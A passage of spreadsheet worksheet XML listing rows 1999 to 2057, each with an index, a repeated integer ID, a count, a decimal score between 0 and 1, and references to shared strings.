    </row>
    <row r="1999" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1999" s="1">
        <v>1997</v>
      </c>
      <c r="B1999">
        <v>307</v>
      </c>
      <c r="C1999">
        <v>307</v>
      </c>
      <c r="D1999">
        <v>1</v>
      </c>
      <c r="E1999">
        <v>0.86009997129440308</v>
      </c>
      <c r="F1999" t="s">
        <v>3911</v>
      </c>
      <c r="G1999" t="s">
        <v>3940</v>
      </c>
      <c r="H1999" t="s">
        <v>3941</v>
      </c>
    </row>
    <row r="2000" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2000" s="1">
        <v>1998</v>
      </c>
      <c r="B2000">
        <v>2442</v>
      </c>
      <c r="C2000">
        <v>2442</v>
      </c>
      <c r="D2000">
        <v>1</v>
      </c>
      <c r="E2000">
        <v>0.99589997529983521</v>
      </c>
      <c r="F2000" t="s">
        <v>3911</v>
      </c>
      <c r="G2000" t="s">
        <v>3942</v>
      </c>
      <c r="H2000" t="s">
        <v>3943</v>
      </c>
    </row>
    <row r="2001" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2001" s="1">
        <v>1999</v>
      </c>
      <c r="B2001">
        <v>7708</v>
      </c>
      <c r="C2001">
        <v>7708</v>
      </c>
      <c r="D2001">
        <v>1</v>
      </c>
      <c r="E2001">
        <v>0.99730002880096436</v>
      </c>
      <c r="F2001" t="s">
        <v>3911</v>
      </c>
      <c r="G2001" t="s">
        <v>3944</v>
      </c>
      <c r="H2001" t="s">
        <v>3945</v>
      </c>
    </row>
    <row r="2002" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2002" s="1">
        <v>2000</v>
      </c>
      <c r="B2002">
        <v>365</v>
      </c>
      <c r="C2002">
        <v>365</v>
      </c>
      <c r="D2002">
        <v>1</v>
      </c>
      <c r="E2002">
        <v>0.56459999084472656</v>
      </c>
      <c r="F2002" t="s">
        <v>3911</v>
      </c>
      <c r="G2002" t="s">
        <v>3946</v>
      </c>
      <c r="H2002" t="s">
        <v>3947</v>
      </c>
    </row>
    <row r="2003" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2003" s="1">
        <v>2001</v>
      </c>
      <c r="B2003">
        <v>505</v>
      </c>
      <c r="C2003">
        <v>505</v>
      </c>
      <c r="D2003">
        <v>1</v>
      </c>
      <c r="E2003">
        <v>0.99550002813339233</v>
      </c>
      <c r="F2003" t="s">
        <v>3911</v>
      </c>
      <c r="G2003" t="s">
        <v>3948</v>
      </c>
      <c r="H2003" t="s">
        <v>3949</v>
      </c>
    </row>
    <row r="2004" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2004" s="1">
        <v>2002</v>
      </c>
      <c r="B2004">
        <v>6597</v>
      </c>
      <c r="C2004">
        <v>6597</v>
      </c>
      <c r="D2004">
        <v>1</v>
      </c>
      <c r="E2004">
        <v>0.99190002679824829</v>
      </c>
      <c r="F2004" t="s">
        <v>3911</v>
      </c>
      <c r="G2004" t="s">
        <v>3950</v>
      </c>
      <c r="H2004" t="s">
        <v>3951</v>
      </c>
    </row>
    <row r="2005" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2005" s="1">
        <v>2003</v>
      </c>
      <c r="B2005">
        <v>4080</v>
      </c>
      <c r="C2005">
        <v>4080</v>
      </c>
      <c r="D2005">
        <v>1</v>
      </c>
      <c r="E2005">
        <v>0.98680001497268677</v>
      </c>
      <c r="F2005" t="s">
        <v>3911</v>
      </c>
      <c r="G2005" t="s">
        <v>3952</v>
      </c>
      <c r="H2005" t="s">
        <v>3953</v>
      </c>
    </row>
    <row r="2006" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2006" s="1">
        <v>2004</v>
      </c>
      <c r="B2006">
        <v>2777</v>
      </c>
      <c r="C2006">
        <v>2777</v>
      </c>
      <c r="D2006">
        <v>1</v>
      </c>
      <c r="E2006">
        <v>0.49279999732971191</v>
      </c>
      <c r="F2006" t="s">
        <v>3911</v>
      </c>
      <c r="G2006" t="s">
        <v>3954</v>
      </c>
      <c r="H2006" t="s">
        <v>3955</v>
      </c>
    </row>
    <row r="2007" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2007" s="1">
        <v>2005</v>
      </c>
      <c r="B2007">
        <v>3939</v>
      </c>
      <c r="C2007">
        <v>3939</v>
      </c>
      <c r="D2007">
        <v>1</v>
      </c>
      <c r="E2007">
        <v>0.99639999866485596</v>
      </c>
      <c r="F2007" t="s">
        <v>3911</v>
      </c>
      <c r="G2007" t="s">
        <v>3956</v>
      </c>
      <c r="H2007" t="s">
        <v>3957</v>
      </c>
    </row>
    <row r="2008" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2008" s="1">
        <v>2006</v>
      </c>
      <c r="B2008">
        <v>2436</v>
      </c>
      <c r="C2008">
        <v>2436</v>
      </c>
      <c r="D2008">
        <v>1</v>
      </c>
      <c r="E2008">
        <v>0.76330000162124634</v>
      </c>
      <c r="F2008" t="s">
        <v>3911</v>
      </c>
      <c r="G2008" t="s">
        <v>3958</v>
      </c>
      <c r="H2008" t="s">
        <v>3959</v>
      </c>
    </row>
    <row r="2009" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2009" s="1">
        <v>2007</v>
      </c>
      <c r="B2009">
        <v>3278</v>
      </c>
      <c r="C2009">
        <v>3278</v>
      </c>
      <c r="D2009">
        <v>1</v>
      </c>
      <c r="E2009">
        <v>0.99220001697540283</v>
      </c>
      <c r="F2009" t="s">
        <v>3911</v>
      </c>
      <c r="G2009" t="s">
        <v>3960</v>
      </c>
      <c r="H2009" t="s">
        <v>3961</v>
      </c>
    </row>
    <row r="2010" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2010" s="1">
        <v>2008</v>
      </c>
      <c r="B2010">
        <v>5630</v>
      </c>
      <c r="C2010">
        <v>5630</v>
      </c>
      <c r="D2010">
        <v>1</v>
      </c>
      <c r="E2010">
        <v>0.98089998960494995</v>
      </c>
      <c r="F2010" t="s">
        <v>3911</v>
      </c>
      <c r="G2010" t="s">
        <v>3962</v>
      </c>
      <c r="H2010" t="s">
        <v>3963</v>
      </c>
    </row>
    <row r="2011" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2011" s="1">
        <v>2009</v>
      </c>
      <c r="B2011">
        <v>520</v>
      </c>
      <c r="C2011">
        <v>520</v>
      </c>
      <c r="D2011">
        <v>1</v>
      </c>
      <c r="E2011">
        <v>0.8937000036239624</v>
      </c>
      <c r="F2011" t="s">
        <v>3911</v>
      </c>
      <c r="G2011" t="s">
        <v>3964</v>
      </c>
      <c r="H2011" t="s">
        <v>3965</v>
      </c>
    </row>
    <row r="2012" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2012" s="1">
        <v>2010</v>
      </c>
      <c r="B2012">
        <v>3971</v>
      </c>
      <c r="C2012">
        <v>3971</v>
      </c>
      <c r="D2012">
        <v>1</v>
      </c>
      <c r="E2012">
        <v>0.52810001373291016</v>
      </c>
      <c r="F2012" t="s">
        <v>3911</v>
      </c>
      <c r="G2012" t="s">
        <v>3966</v>
      </c>
      <c r="H2012" t="s">
        <v>3967</v>
      </c>
    </row>
    <row r="2013" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2013" s="1">
        <v>2011</v>
      </c>
      <c r="B2013">
        <v>2353</v>
      </c>
      <c r="C2013">
        <v>2353</v>
      </c>
      <c r="D2013">
        <v>1</v>
      </c>
      <c r="E2013">
        <v>0.97310000658035278</v>
      </c>
      <c r="F2013" t="s">
        <v>3911</v>
      </c>
      <c r="G2013" t="s">
        <v>3968</v>
      </c>
      <c r="H2013" t="s">
        <v>3969</v>
      </c>
    </row>
    <row r="2014" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2014" s="1">
        <v>2012</v>
      </c>
      <c r="B2014">
        <v>2438</v>
      </c>
      <c r="C2014">
        <v>2438</v>
      </c>
      <c r="D2014">
        <v>1</v>
      </c>
      <c r="E2014">
        <v>0.97539997100830078</v>
      </c>
      <c r="F2014" t="s">
        <v>3911</v>
      </c>
      <c r="G2014" t="s">
        <v>3970</v>
      </c>
      <c r="H2014" t="s">
        <v>3971</v>
      </c>
    </row>
    <row r="2015" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2015" s="1">
        <v>2013</v>
      </c>
      <c r="B2015">
        <v>2439</v>
      </c>
      <c r="C2015">
        <v>2439</v>
      </c>
      <c r="D2015">
        <v>1</v>
      </c>
      <c r="E2015">
        <v>0.48939999938011169</v>
      </c>
      <c r="F2015" t="s">
        <v>3911</v>
      </c>
      <c r="G2015" t="s">
        <v>3972</v>
      </c>
      <c r="H2015" t="s">
        <v>3973</v>
      </c>
    </row>
    <row r="2016" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2016" s="1">
        <v>2014</v>
      </c>
      <c r="B2016">
        <v>2440</v>
      </c>
      <c r="C2016">
        <v>2440</v>
      </c>
      <c r="D2016">
        <v>1</v>
      </c>
      <c r="E2016">
        <v>0.98989999294281006</v>
      </c>
      <c r="F2016" t="s">
        <v>3911</v>
      </c>
      <c r="G2016" t="s">
        <v>3974</v>
      </c>
      <c r="H2016" t="s">
        <v>3975</v>
      </c>
    </row>
    <row r="2017" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2017" s="1">
        <v>2015</v>
      </c>
      <c r="B2017">
        <v>6600</v>
      </c>
      <c r="C2017">
        <v>6600</v>
      </c>
      <c r="D2017">
        <v>1</v>
      </c>
      <c r="E2017">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2017" t="s">
        <v>3911</v>
      </c>
      <c r="G2017" t="s">
        <v>3976</v>
      </c>
      <c r="H2017" t="s">
        <v>3977</v>
      </c>
    </row>
    <row r="2018" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2018" s="1">
        <v>2016</v>
      </c>
      <c r="B2018">
        <v>3126</v>
      </c>
      <c r="C2018">
        <v>3126</v>
      </c>
      <c r="D2018">
        <v>1</v>
      </c>
      <c r="E2018">
        <v>0.99940001964569092</v>
      </c>
      <c r="F2018" t="s">
        <v>3911</v>
      </c>
      <c r="G2018" t="s">
        <v>3978</v>
      </c>
      <c r="H2018" t="s">
        <v>3979</v>
      </c>
    </row>
    <row r="2019" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2019" s="1">
        <v>2017</v>
      </c>
      <c r="B2019">
        <v>2965</v>
      </c>
      <c r="C2019">
        <v>2965</v>
      </c>
      <c r="D2019">
        <v>1</v>
      </c>
      <c r="E2019">
        <v>0.52950000762939453</v>
      </c>
      <c r="F2019" t="s">
        <v>3911</v>
      </c>
      <c r="G2019" t="s">
        <v>3980</v>
      </c>
      <c r="H2019" t="s">
        <v>3981</v>
      </c>
    </row>
    <row r="2020" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2020" s="1">
        <v>2018</v>
      </c>
      <c r="B2020">
        <v>5309</v>
      </c>
      <c r="C2020">
        <v>5309</v>
      </c>
      <c r="D2020">
        <v>1</v>
      </c>
      <c r="E2020">
        <v>0.71319997310638428</v>
      </c>
      <c r="F2020" t="s">
        <v>3911</v>
      </c>
      <c r="G2020" t="s">
        <v>3982</v>
      </c>
      <c r="H2020" t="s">
        <v>3983</v>
      </c>
    </row>
    <row r="2021" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2021" s="1">
        <v>2019</v>
      </c>
      <c r="B2021">
        <v>636</v>
      </c>
      <c r="C2021">
        <v>636</v>
      </c>
      <c r="D2021">
        <v>1</v>
      </c>
      <c r="E2021">
        <v>0.99709999561309814</v>
      </c>
      <c r="F2021" t="s">
        <v>3911</v>
      </c>
      <c r="G2021" t="s">
        <v>3984</v>
      </c>
      <c r="H2021" t="s">
        <v>3985</v>
      </c>
    </row>
    <row r="2022" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2022" s="1">
        <v>2020</v>
      </c>
      <c r="B2022">
        <v>635</v>
      </c>
      <c r="C2022">
        <v>635</v>
      </c>
      <c r="D2022">
        <v>1</v>
      </c>
      <c r="E2022">
        <v>0.99709999561309814</v>
      </c>
      <c r="F2022" t="s">
        <v>3911</v>
      </c>
      <c r="G2022" t="s">
        <v>3986</v>
      </c>
      <c r="H2022" t="s">
        <v>3987</v>
      </c>
    </row>
    <row r="2023" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2023" s="1">
        <v>2021</v>
      </c>
      <c r="B2023">
        <v>7751</v>
      </c>
      <c r="C2023">
        <v>7751</v>
      </c>
      <c r="D2023">
        <v>1</v>
      </c>
      <c r="E2023">
        <v>0.63770002126693726</v>
      </c>
      <c r="F2023" t="s">
        <v>3911</v>
      </c>
      <c r="G2023" t="s">
        <v>3988</v>
      </c>
      <c r="H2023" t="s">
        <v>3989</v>
      </c>
    </row>
    <row r="2024" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2024" s="1">
        <v>2022</v>
      </c>
      <c r="B2024">
        <v>1294</v>
      </c>
      <c r="C2024">
        <v>1294</v>
      </c>
      <c r="D2024">
        <v>1</v>
      </c>
      <c r="E2024">
        <v>0.73989999294281006</v>
      </c>
      <c r="F2024" t="s">
        <v>3911</v>
      </c>
      <c r="G2024" t="s">
        <v>3990</v>
      </c>
      <c r="H2024" t="s">
        <v>3991</v>
      </c>
    </row>
    <row r="2025" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2025" s="1">
        <v>2023</v>
      </c>
      <c r="B2025">
        <v>2788</v>
      </c>
      <c r="C2025">
        <v>2788</v>
      </c>
      <c r="D2025">
        <v>1</v>
      </c>
      <c r="E2025">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2025" t="s">
        <v>3911</v>
      </c>
      <c r="G2025" t="s">
        <v>3992</v>
      </c>
      <c r="H2025" t="s">
        <v>3993</v>
      </c>
    </row>
    <row r="2026" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2026" s="1">
        <v>2024</v>
      </c>
      <c r="B2026">
        <v>6823</v>
      </c>
      <c r="C2026">
        <v>6823</v>
      </c>
      <c r="D2026">
        <v>1</v>
      </c>
      <c r="E2026">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2026" t="s">
        <v>3911</v>
      </c>
      <c r="G2026" t="s">
        <v>3994</v>
      </c>
      <c r="H2026" t="s">
        <v>3995</v>
      </c>
    </row>
    <row r="2027" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2027" s="1">
        <v>2025</v>
      </c>
      <c r="B2027">
        <v>3244</v>
      </c>
      <c r="C2027">
        <v>3244</v>
      </c>
      <c r="D2027">
        <v>1</v>
      </c>
      <c r="E2027">
        <v>0.30540001392364502</v>
      </c>
      <c r="F2027" t="s">
        <v>3911</v>
      </c>
      <c r="G2027" t="s">
        <v>3996</v>
      </c>
      <c r="H2027" t="s">
        <v>3997</v>
      </c>
    </row>
    <row r="2028" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2028" s="1">
        <v>2026</v>
      </c>
      <c r="B2028">
        <v>6822</v>
      </c>
      <c r="C2028">
        <v>6822</v>
      </c>
      <c r="D2028">
        <v>1</v>
      </c>
      <c r="E2028">
        <v>0.99559998512268066</v>
      </c>
      <c r="F2028" t="s">
        <v>3911</v>
      </c>
      <c r="G2028" t="s">
        <v>3998</v>
      </c>
      <c r="H2028" t="s">
        <v>3999</v>
      </c>
    </row>
    <row r="2029" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2029" s="1">
        <v>2027</v>
      </c>
      <c r="B2029">
        <v>7692</v>
      </c>
      <c r="C2029">
        <v>7692</v>
      </c>
      <c r="D2029">
        <v>1</v>
      </c>
      <c r="E2029">
        <v>0.39770001173019409</v>
      </c>
      <c r="F2029" t="s">
        <v>3911</v>
      </c>
      <c r="G2029" t="s">
        <v>4000</v>
      </c>
      <c r="H2029" t="s">
        <v>4001</v>
      </c>
    </row>
    <row r="2030" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2030" s="1">
        <v>2028</v>
      </c>
      <c r="B2030">
        <v>4113</v>
      </c>
      <c r="C2030">
        <v>4113</v>
      </c>
      <c r="D2030">
        <v>1</v>
      </c>
      <c r="E2030">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2030" t="s">
        <v>3911</v>
      </c>
      <c r="G2030" t="s">
        <v>4002</v>
      </c>
      <c r="H2030" t="s">
        <v>4003</v>
      </c>
    </row>
    <row r="2031" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2031" s="1">
        <v>2029</v>
      </c>
      <c r="B2031">
        <v>2355</v>
      </c>
      <c r="C2031">
        <v>2355</v>
      </c>
      <c r="D2031">
        <v>1</v>
      </c>
      <c r="E2031">
        <v>0.9869999885559082</v>
      </c>
      <c r="F2031" t="s">
        <v>3911</v>
      </c>
      <c r="G2031" t="s">
        <v>4004</v>
      </c>
      <c r="H2031" t="s">
        <v>4005</v>
      </c>
    </row>
    <row r="2032" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2032" s="1">
        <v>2030</v>
      </c>
      <c r="B2032">
        <v>7786</v>
      </c>
      <c r="C2032">
        <v>7786</v>
      </c>
      <c r="D2032">
        <v>1</v>
      </c>
      <c r="E2032">
        <v>0.99849998950958252</v>
      </c>
      <c r="F2032" t="s">
        <v>3911</v>
      </c>
      <c r="G2032" t="s">
        <v>4006</v>
      </c>
      <c r="H2032" t="s">
        <v>4007</v>
      </c>
    </row>
    <row r="2033" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2033" s="1">
        <v>2031</v>
      </c>
      <c r="B2033">
        <v>5724</v>
      </c>
      <c r="C2033">
        <v>5724</v>
      </c>
      <c r="D2033">
        <v>1</v>
      </c>
      <c r="E2033">
        <v>0.71090000867843628</v>
      </c>
      <c r="F2033" t="s">
        <v>3911</v>
      </c>
      <c r="G2033" t="s">
        <v>4008</v>
      </c>
      <c r="H2033" t="s">
        <v>4009</v>
      </c>
    </row>
    <row r="2034" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2034" s="1">
        <v>2032</v>
      </c>
      <c r="B2034">
        <v>5298</v>
      </c>
      <c r="C2034">
        <v>5298</v>
      </c>
      <c r="D2034">
        <v>1</v>
      </c>
      <c r="E2034">
        <v>0.60140001773834229</v>
      </c>
      <c r="F2034" t="s">
        <v>3911</v>
      </c>
      <c r="G2034" t="s">
        <v>4010</v>
      </c>
      <c r="H2034" t="s">
        <v>4011</v>
      </c>
    </row>
    <row r="2035" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2035" s="1">
        <v>2033</v>
      </c>
      <c r="B2035">
        <v>3979</v>
      </c>
      <c r="C2035">
        <v>3979</v>
      </c>
      <c r="D2035">
        <v>1</v>
      </c>
      <c r="E2035">
        <v>0.49900001287460333</v>
      </c>
      <c r="F2035" t="s">
        <v>3911</v>
      </c>
      <c r="G2035" t="s">
        <v>4012</v>
      </c>
      <c r="H2035" t="s">
        <v>4013</v>
      </c>
    </row>
    <row r="2036" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2036" s="1">
        <v>2034</v>
      </c>
      <c r="B2036">
        <v>2793</v>
      </c>
      <c r="C2036">
        <v>2793</v>
      </c>
      <c r="D2036">
        <v>1</v>
      </c>
      <c r="E2036">
        <v>0.54680001735687256</v>
      </c>
      <c r="F2036" t="s">
        <v>3911</v>
      </c>
      <c r="G2036" t="s">
        <v>4014</v>
      </c>
      <c r="H2036" t="s">
        <v>4015</v>
      </c>
    </row>
    <row r="2037" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2037" s="1">
        <v>2035</v>
      </c>
      <c r="B2037">
        <v>2354</v>
      </c>
      <c r="C2037">
        <v>2354</v>
      </c>
      <c r="D2037">
        <v>1</v>
      </c>
      <c r="E2037">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2037" t="s">
        <v>3911</v>
      </c>
      <c r="G2037" t="s">
        <v>4016</v>
      </c>
      <c r="H2037" t="s">
        <v>4017</v>
      </c>
    </row>
    <row r="2038" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2038" s="1">
        <v>2036</v>
      </c>
      <c r="B2038">
        <v>6686</v>
      </c>
      <c r="C2038">
        <v>6686</v>
      </c>
      <c r="D2038">
        <v>1</v>
      </c>
      <c r="E2038">
        <v>0.98830002546310425</v>
      </c>
      <c r="F2038" t="s">
        <v>3911</v>
      </c>
      <c r="G2038" t="s">
        <v>4018</v>
      </c>
      <c r="H2038" t="s">
        <v>4019</v>
      </c>
    </row>
    <row r="2039" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2039" s="1">
        <v>2037</v>
      </c>
      <c r="B2039">
        <v>2472</v>
      </c>
      <c r="C2039">
        <v>2472</v>
      </c>
      <c r="D2039">
        <v>1</v>
      </c>
      <c r="E2039">
        <v>0.78130000829696655</v>
      </c>
      <c r="F2039" t="s">
        <v>3911</v>
      </c>
      <c r="G2039" t="s">
        <v>4020</v>
      </c>
      <c r="H2039" t="s">
        <v>4021</v>
      </c>
    </row>
    <row r="2040" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2040" s="1">
        <v>2038</v>
      </c>
      <c r="B2040">
        <v>7707</v>
      </c>
      <c r="C2040">
        <v>7707</v>
      </c>
      <c r="D2040">
        <v>1</v>
      </c>
      <c r="E2040">
        <v>0.99769997596740723</v>
      </c>
      <c r="F2040" t="s">
        <v>3911</v>
      </c>
      <c r="G2040" t="s">
        <v>4022</v>
      </c>
      <c r="H2040" t="s">
        <v>4023</v>
      </c>
    </row>
    <row r="2041" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2041" s="1">
        <v>2039</v>
      </c>
      <c r="B2041">
        <v>4269</v>
      </c>
      <c r="C2041">
        <v>4269</v>
      </c>
      <c r="D2041">
        <v>1</v>
      </c>
      <c r="E2041">
        <v>0.99330002069473267</v>
      </c>
      <c r="F2041" t="s">
        <v>3911</v>
      </c>
      <c r="G2041" t="s">
        <v>4024</v>
      </c>
      <c r="H2041" t="s">
        <v>4025</v>
      </c>
    </row>
    <row r="2042" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2042" s="1">
        <v>2040</v>
      </c>
      <c r="B2042">
        <v>4112</v>
      </c>
      <c r="C2042">
        <v>4112</v>
      </c>
      <c r="D2042">
        <v>1</v>
      </c>
      <c r="E2042">
        <v>0.99940001964569092</v>
      </c>
      <c r="F2042" t="s">
        <v>3911</v>
      </c>
      <c r="G2042" t="s">
        <v>4026</v>
      </c>
      <c r="H2042" t="s">
        <v>4027</v>
      </c>
    </row>
    <row r="2043" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2043" s="1">
        <v>2041</v>
      </c>
      <c r="B2043">
        <v>632</v>
      </c>
      <c r="C2043">
        <v>632</v>
      </c>
      <c r="D2043">
        <v>1</v>
      </c>
      <c r="E2043">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2043" t="s">
        <v>3911</v>
      </c>
      <c r="G2043" t="s">
        <v>4028</v>
      </c>
      <c r="H2043" t="s">
        <v>4029</v>
      </c>
    </row>
    <row r="2044" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2044" s="1">
        <v>2042</v>
      </c>
      <c r="B2044">
        <v>6265</v>
      </c>
      <c r="C2044">
        <v>6265</v>
      </c>
      <c r="D2044">
        <v>1</v>
      </c>
      <c r="E2044">
        <v>0.8059999942779541</v>
      </c>
      <c r="F2044" t="s">
        <v>3911</v>
      </c>
      <c r="G2044" t="s">
        <v>4030</v>
      </c>
      <c r="H2044" t="s">
        <v>4031</v>
      </c>
    </row>
    <row r="2045" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2045" s="1">
        <v>2043</v>
      </c>
      <c r="B2045">
        <v>524</v>
      </c>
      <c r="C2045">
        <v>524</v>
      </c>
      <c r="D2045">
        <v>1</v>
      </c>
      <c r="E2045">
        <v>0.99709999561309814</v>
      </c>
      <c r="F2045" t="s">
        <v>3911</v>
      </c>
      <c r="G2045" t="s">
        <v>4032</v>
      </c>
      <c r="H2045" t="s">
        <v>4033</v>
      </c>
    </row>
    <row r="2046" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2046" s="1">
        <v>2044</v>
      </c>
      <c r="B2046">
        <v>2357</v>
      </c>
      <c r="C2046">
        <v>2357</v>
      </c>
      <c r="D2046">
        <v>1</v>
      </c>
      <c r="E2046">
        <v>0.9560999870300293</v>
      </c>
      <c r="F2046" t="s">
        <v>3911</v>
      </c>
      <c r="G2046" t="s">
        <v>4034</v>
      </c>
      <c r="H2046" t="s">
        <v>4035</v>
      </c>
    </row>
    <row r="2047" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2047" s="1">
        <v>2045</v>
      </c>
      <c r="B2047">
        <v>6190</v>
      </c>
      <c r="C2047">
        <v>6190</v>
      </c>
      <c r="D2047">
        <v>1</v>
      </c>
      <c r="E2047">
        <v>0.62360000610351563</v>
      </c>
      <c r="F2047" t="s">
        <v>3911</v>
      </c>
      <c r="G2047" t="s">
        <v>4036</v>
      </c>
      <c r="H2047" t="s">
        <v>4037</v>
      </c>
    </row>
    <row r="2048" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2048" s="1">
        <v>2046</v>
      </c>
      <c r="B2048">
        <v>6494</v>
      </c>
      <c r="C2048">
        <v>6494</v>
      </c>
      <c r="D2048">
        <v>1</v>
      </c>
      <c r="E2048">
        <v>0.6841999888420105</v>
      </c>
      <c r="F2048" t="s">
        <v>3911</v>
      </c>
      <c r="G2048" t="s">
        <v>4038</v>
      </c>
      <c r="H2048" t="s">
        <v>4039</v>
      </c>
    </row>
    <row r="2049" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2049" s="1">
        <v>2047</v>
      </c>
      <c r="B2049">
        <v>2785</v>
      </c>
      <c r="C2049">
        <v>2785</v>
      </c>
      <c r="D2049">
        <v>1</v>
      </c>
      <c r="E2049">
        <v>0.5163000226020813</v>
      </c>
      <c r="F2049" t="s">
        <v>3911</v>
      </c>
      <c r="G2049" t="s">
        <v>4040</v>
      </c>
      <c r="H2049" t="s">
        <v>4041</v>
      </c>
    </row>
    <row r="2050" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2050" s="1">
        <v>2048</v>
      </c>
      <c r="B2050">
        <v>6124</v>
      </c>
      <c r="C2050">
        <v>6124</v>
      </c>
      <c r="D2050">
        <v>1</v>
      </c>
      <c r="E2050">
        <v>0.5218999981880188</v>
      </c>
      <c r="F2050" t="s">
        <v>3911</v>
      </c>
      <c r="G2050" t="s">
        <v>4042</v>
      </c>
      <c r="H2050" t="s">
        <v>4043</v>
      </c>
    </row>
    <row r="2051" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2051" s="1">
        <v>2049</v>
      </c>
      <c r="B2051">
        <v>631</v>
      </c>
      <c r="C2051">
        <v>631</v>
      </c>
      <c r="D2051">
        <v>1</v>
      </c>
      <c r="E2051">
        <v>0.99599999189376831</v>
      </c>
      <c r="F2051" t="s">
        <v>3911</v>
      </c>
      <c r="G2051" t="s">
        <v>4044</v>
      </c>
      <c r="H2051" t="s">
        <v>4045</v>
      </c>
    </row>
    <row r="2052" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2052" s="1">
        <v>2050</v>
      </c>
      <c r="B2052">
        <v>633</v>
      </c>
      <c r="C2052">
        <v>633</v>
      </c>
      <c r="D2052">
        <v>1</v>
      </c>
      <c r="E2052">
        <v>0.97119998931884766</v>
      </c>
      <c r="F2052" t="s">
        <v>3911</v>
      </c>
      <c r="G2052" t="s">
        <v>4046</v>
      </c>
      <c r="H2052" t="s">
        <v>4047</v>
      </c>
    </row>
    <row r="2053" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2053" s="1">
        <v>2051</v>
      </c>
      <c r="B2053">
        <v>2458</v>
      </c>
      <c r="C2053">
        <v>2458</v>
      </c>
      <c r="D2053">
        <v>1</v>
      </c>
      <c r="E2053">
        <v>0.99570000171661377</v>
      </c>
      <c r="F2053" t="s">
        <v>3911</v>
      </c>
      <c r="G2053" t="s">
        <v>4048</v>
      </c>
      <c r="H2053" t="s">
        <v>4049</v>
      </c>
    </row>
    <row r="2054" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2054" s="1">
        <v>2052</v>
      </c>
      <c r="B2054">
        <v>2459</v>
      </c>
      <c r="C2054">
        <v>2459</v>
      </c>
      <c r="D2054">
        <v>1</v>
      </c>
      <c r="E2054">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2054" t="s">
        <v>3911</v>
      </c>
      <c r="G2054" t="s">
        <v>4050</v>
      </c>
      <c r="H2054" t="s">
        <v>4051</v>
      </c>
    </row>
    <row r="2055" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2055" s="1">
        <v>2053</v>
      </c>
      <c r="B2055">
        <v>6123</v>
      </c>
      <c r="C2055">
        <v>6123</v>
      </c>
      <c r="D2055">
        <v>1</v>
      </c>
      <c r="E2055">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2055" t="s">
        <v>3911</v>
      </c>
      <c r="G2055" t="s">
        <v>4052</v>
      </c>
      <c r="H2055" t="s">
        <v>4053</v>
      </c>
    </row>
    <row r="2056" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2056" s="1">
        <v>2054</v>
      </c>
      <c r="B2056">
        <v>5299</v>
      </c>
      <c r="C2056">
        <v>5299</v>
      </c>
      <c r="D2056">
        <v>1</v>
      </c>
      <c r="E2056">
        <v>0.95980000495910645</v>
      </c>
      <c r="F2056" t="s">
        <v>3911</v>
      </c>
      <c r="G2056" t="s">
        <v>4054</v>
      </c>
      <c r="H2056" t="s">
        <v>4055</v>
      </c>
    </row>
    <row r="2057" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2057" s="1">
        <v>2055</v>
      </c>
      <c r="B2057">
        <v>2460</v>
      </c>
      <c r="C2057">
        <v>2460</v>
